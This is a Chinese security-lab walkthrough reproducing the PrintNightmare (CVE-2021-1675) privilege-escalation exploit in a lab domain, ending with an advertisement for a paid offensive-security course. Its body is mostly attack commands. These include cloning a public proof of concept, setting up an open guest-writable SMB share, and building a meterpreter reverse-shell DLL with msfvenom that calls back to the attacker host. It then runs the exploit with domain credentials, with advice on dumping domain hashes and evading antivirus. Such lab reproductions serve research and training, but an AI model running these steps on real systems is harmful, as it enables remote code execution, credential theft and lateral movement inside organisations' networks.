文章来源|MS08067安全实验室
本文作者:龙诺(Web知识星球追洞小组)
实验环境:windows2019 (192.168.189.145)
kali linux (192.168.189.146)
需要:一个普通的域账户
需要:开启 print spooler服务
使用反弹shell :需要关闭windows2019的安全中心 或者用免杀
需要:windows2019安装smb1协议(没有这个会报错)
我这里使用的是python虚拟环境安装搭建这样的好处是不破坏系统环境,因为python有时候安装各种模块多了容易冲突所一我们使用虚拟环境。
virtualenv -p python3 文件夹
如果没有virtualenv的话需要你pip安装模块
构造完成以后我们使用
source 文件夹/bin/activate
进入后我们去github下载poc安装
git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/cube0x0/impacket
首先要下载poc impacket模块然后安装
因为我们使用的是虚拟环境所以我们可以直接安装安装完以后切换到poc处就可以了
source 文件夹/bin/activate python setup.py install python CVE-2021-1675.py -h
[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.%m max log size = 5 min protocol = SMB2
[smb] comment = Samba browseable = yes writeable = yes public = yes path = /tmp/ read only = no guest ok = yes
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.189.146 LPORT=4444 -f dll -o /tmp/rever.dll msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp exploit
python CVE-2021-1675.py demonba.xxx/yuce:[email protected] '\\192.168.189.146\smb\rever.dll'
如果出错则需要安装smb1在windows2019上出错代码,下图
可以现在2019连接smb服务器出现这种报错
成功,下图
impacket-smbserver服务器也会有数据交互
同时会有反弹shell
我们可以直接查看域中账户hash 进行横向渗透
上传成功,如果开着windows安全中心会出现图
上传不成功
这里就要考虑免杀了,切记只能是普通账户
https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare
需要了解smb配置
windows2019域配置
在kali无法连接2019的时候逆向思考看看2019可以连接smb共享文件码?
https://github.com/cube0x0/CVE-2021-1675/issues/36 这里也有人问这个问题我不知道他解决了吗?
我是受下面一句话很长时间突然开悟了2019可以链接吗?
复现看着简单但是各种环境问题还有小白配置问题只有复现了才知道!
追洞小组负责人Taoing主讲
WEB高级攻防实战班 第1期 来袭
课程围绕:外围打点、边界突破、PHP审计、SRC漏洞挖掘、应急响应
课程大纲(最新)
*大纲仅作为参考,会根据当期进度有所变化(加客服获取高清课程导图)
课程目录(最新)
课程费用
学习资源
上课时间
上课方式
讲师介绍
TtssGkf:MS08067安全实验室核心成员,Web安全知识星球合伙人,Defcon Group 86021议题分享者,致力于漏洞分析、代码审计、漏洞挖掘。
你距离大佬,只差一个决定
详情咨询请联系小客服
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!